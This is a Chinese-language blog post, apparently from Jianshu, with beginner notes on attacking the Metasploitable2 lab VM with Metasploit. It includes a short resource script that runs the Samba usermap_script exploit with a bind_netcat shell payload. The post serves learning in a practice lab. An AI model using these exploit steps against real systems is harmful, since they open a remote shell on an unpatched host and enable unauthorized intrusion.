[滲透測試]metasploit學(xué)習(xí)筆記——簡單使用(一)

最近想找一個滲透測試的項目做,因此想學(xué)習(xí)一下metasploit的使用。
metasploit是一個強(qiáng)大的滲透測試工具,受到廣大安全愛好者的喜歡。
接下來,我將記錄下--我根據(jù)<<Metasploit滲透測試魔鬼訓(xùn)練營>>這本書,學(xué)習(xí)和使用metasploit進(jìn)行滲透測試的過程。

對metasploitable2滲透測試

1.先去官網(wǎng)下載metasploitable2鏡像,將其部署在vmware虛擬機(jī)上面,并啟動。默認(rèn)的登錄賬戶和密碼都是msfadmin
2.啟動kali虛擬機(jī),在終端下輸入msfconsole就可以啟動msf終端了
3.使用samba漏洞對metasploitable2的測試流程:

啟動&查找(search) Samba漏洞的exploit

Paste_Image.png

use exploit& show payloads

Paste_Image.png

set payload & show options & set RHOST

im

最后輸入exploit就會執(zhí)行之前設(shè)置好的exploit,之后利用成功之后會顯示生成一個shell,就可以執(zhí)行命令了
(注:跟一般的終端不一樣,沒有前綴,想看是否利用成功,可以輸入命令試試看是否返回結(jié)果,我輸入的ls -l)

Paste_Image.png

tips:
1.輸入umane -a可以查看機(jī)器的系統(tǒng)信息。

那么,怎么實現(xiàn)一個自動化的腳本來利用msf去滲透呢?可以這么做

  • 先查看一些msfconsole的幫助命令:
Paste_Image.png
  • 發(fā)現(xiàn)可以用msfconsole -r file來執(zhí)行一個腳本,因此先創(chuàng)建一個文件hello.msf,內(nèi)容為
use multi/samba/usermap_script
set payload cmd/unix/bind_netcat
set RHOST 192.168.150.132
exploit
  • 然后輸入msfconsole -r hello.msf,執(zhí)行成功后如下圖:
Paste_Image.png
Paste_Image.png
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

推薦閱讀更多精彩內(nèi)容